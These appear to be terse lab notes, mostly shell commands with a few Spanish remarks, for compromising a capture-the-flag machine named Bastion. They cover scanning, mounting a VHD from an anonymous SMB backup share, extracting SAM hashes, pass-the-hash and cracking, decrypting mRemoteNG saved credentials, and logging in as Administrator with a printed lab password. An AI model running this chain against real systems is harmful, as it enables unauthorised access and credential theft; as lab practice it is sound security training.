nmap -A -p- -oA secnotes 10.129.178.250 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA secnotes 10.129.178.250
nmap -sU -O -p- -oA secnotes-udp 10.129.178.250
nikto -h 10.129.178.250:80
crackmapexec smb 10.129.1.39
smbclient //10.129.1.39/Backups -N
sudo mkdir /mnt/smb
mount -t cifs "//10.129.1.39/Backups" /mnt/smb
cd /mnt/smb
tree
sudo rmmod nbd
sudo modprobe nbd
ls /dev
sudo qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
sudo mount /mnt/vhd
sudo mkdir /mnt/vhd
sudo mount /dev/nbd0p1 /mnt/vhd
No encontramos user.txt
Nos dirigimos al directorio config
Tratamos de hacer una copia del SAM
crackmapexec smb bastion.htb -u 'Administrator' -H '31d6c...'
crackmapexec smb bastion.htb -u 'L4mpje' -H '2611...'
crackmapexec winrm bastion.htb -u 'L4mpje' -H '2611...'
la contrasena bureaulampje
john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=NT
ssh L4mpje@bastion.htb
whoami /priv
whoami /all
Vemos el mRemoteNG
cd C:\PROGRA~2
cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG
type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
git clone https://github.com/haseebT/mRemoteNG-Decrypt
python mremoteng_decrypt.py -s 'aEWNFVS...'
Conseguimos las credenciales-> Administrator:thXLHM96BeKL0ER2
crackmapexec smb bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'
evil-winrm -i bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'